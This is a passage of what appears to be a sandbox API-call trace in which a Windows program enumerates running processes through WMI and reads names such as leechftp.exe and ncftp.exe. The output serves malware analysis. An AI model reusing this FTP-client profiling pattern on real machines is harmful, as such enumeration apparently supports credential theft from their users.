WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8c78, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8c78) returned 0x0 [0225.312] WbemDefPath:IUnknown:AddRef (This=0x5eb8c78) returned 0x3 [0225.312] WbemDefPath:IUnknown:Release (This=0x5eb8c78) returned 0x2 [0225.312] WbemDefPath:IWbemPath:SetText (This=0x5eb8c78, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1588\"") returned 0x0 [0225.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.312] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.313] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.313] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.313] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.313] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.313] IWbemClassObject:Get (in: This=0x5ebbd28, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f290c*=0, plFlavor=0x26f2910*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x26f290c*=8, plFlavor=0x26f2910*=0) returned 0x0 [0225.313] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0225.313] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0225.313] IWbemClassObject:Get (in: This=0x5ebbd28, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f290c*=8, plFlavor=0x26f2910*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x26f290c*=8, plFlavor=0x26f2910*=0) returned 0x0 [0225.313] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0225.313] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0225.313] CoTaskMemAlloc (cb=0x4) returned 0x5ebaff0 [0225.313] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebaff0, puReturned=0x26dde18 | out: apObjects=0x5ebaff0*=0x5ebbec0, puReturned=0x26dde18*=0x1) returned 0x0 [0225.321] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebbec0) returned 0x0 [0225.321] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.321] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.321] IUnknown:AddRef (This=0x5ebbec0) returned 0x3 [0225.321] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.321] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.321] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebbec4) returned 0x0 [0225.321] IMarshal:GetUnmarshalClass (in: This=0x5ebbec4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.322] IUnknown:Release (This=0x5ebbec4) returned 0x3 [0225.322] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.322] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.322] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.322] IUnknown:Release (This=0x5ebbec0) returned 0x2 [0225.322] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.322] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.322] IUnknown:QueryInterface (in: This=0x5ebbec0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebbec0) returned 0x0 [0225.322] IUnknown:AddRef (This=0x5ebbec0) returned 0x4 [0225.322] IUnknown:Release (This=0x5ebbec0) returned 0x3 [0225.322] IUnknown:Release (This=0x5ebbec0) returned 0x2 [0225.322] CoTaskMemFree (pv=0x5ebaff0) [0225.322] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.322] IUnknown:AddRef (This=0x5ebbec0) returned 0x3 [0225.322] IWbemClassObject:Get (in: This=0x5ebbec0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.323] IWbemClassObject:Get (in: This=0x5ebbec0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2064\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.323] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2064\"") returned 0x66 [0225.323] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2064\"") returned 0x66 [0225.323] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.323] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.323] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.323] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.324] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebaff0) returned 0x0 [0225.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebaff0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.325] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebaff0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8d58) returned 0x0 [0225.325] WbemDefPath:IUnknown:Release (This=0x5ebaff0) returned 0x0 [0225.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8d58, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8d58) returned 0x0 [0225.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8d58, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.325] WbemDefPath:IUnknown:AddRef (This=0x5eb8d58) returned 0x3 [0225.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8d58, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8d58, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8d58, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb000) returned 0x0 [0225.326] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb000, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.326] WbemDefPath:IUnknown:Release (This=0x5ebb000) returned 0x3 [0225.326] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.326] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8d58, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.326] WbemDefPath:IUnknown:Release (This=0x5eb8d58) returned 0x2 [0225.326] WbemDefPath:IUnknown:Release (This=0x5eb8d58) returned 0x1 [0225.326] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.326] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8d58, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8d58) returned 0x0 [0225.326] WbemDefPath:IUnknown:AddRef (This=0x5eb8d58) returned 0x3 [0225.326] WbemDefPath:IUnknown:Release (This=0x5eb8d58) returned 0x2 [0225.326] WbemDefPath:IWbemPath:SetText (This=0x5eb8d58, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2064\"") returned 0x0 [0225.326] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.326] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.326] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.326] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.327] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.327] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.327] IWbemClassObject:Get (in: This=0x5ebbec0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f3180*=0, plFlavor=0x26f3184*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x26f3180*=8, plFlavor=0x26f3184*=0) returned 0x0 [0225.327] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0225.327] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0225.327] IWbemClassObject:Get (in: This=0x5ebbec0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f3180*=8, plFlavor=0x26f3184*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x26f3180*=8, plFlavor=0x26f3184*=0) returned 0x0 [0225.327] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0225.327] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0225.327] CoTaskMemAlloc (cb=0x4) returned 0x5ebb030 [0225.327] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebb030, puReturned=0x26dde18 | out: apObjects=0x5ebb030*=0x5ebc058, puReturned=0x26dde18*=0x1) returned 0x0 [0225.328] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebc058) returned 0x0 [0225.328] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.329] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.329] IUnknown:AddRef (This=0x5ebc058) returned 0x3 [0225.329] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.329] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.329] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebc05c) returned 0x0 [0225.329] IMarshal:GetUnmarshalClass (in: This=0x5ebc05c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.329] IUnknown:Release (This=0x5ebc05c) returned 0x3 [0225.329] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.329] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.329] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.329] IUnknown:Release (This=0x5ebc058) returned 0x2 [0225.329] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.329] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.330] IUnknown:QueryInterface (in: This=0x5ebc058, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebc058) returned 0x0 [0225.330] IUnknown:AddRef (This=0x5ebc058) returned 0x4 [0225.330] IUnknown:Release (This=0x5ebc058) returned 0x3 [0225.330] IUnknown:Release (This=0x5ebc058) returned 0x2 [0225.330] CoTaskMemFree (pv=0x5ebb030) [0225.330] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.330] IUnknown:AddRef (This=0x5ebc058) returned 0x3 [0225.330] IWbemClassObject:Get (in: This=0x5ebc058, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.331] IWbemClassObject:Get (in: This=0x5ebc058, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.331] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"") returned 0x66 [0225.331] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"") returned 0x66 [0225.331] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.331] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.331] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.331] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.332] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebb030) returned 0x0 [0225.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebb030, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.332] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebb030, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8e38) returned 0x0 [0225.332] WbemDefPath:IUnknown:Release (This=0x5ebb030) returned 0x0 [0225.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8e38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8e38) returned 0x0 [0225.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8e38, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.333] WbemDefPath:IUnknown:AddRef (This=0x5eb8e38) returned 0x3 [0225.333] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8e38, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.333] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8e38, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.333] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8e38, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb040) returned 0x0 [0225.333] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb040, riid=0x71d52a54*(Data1=0x0, 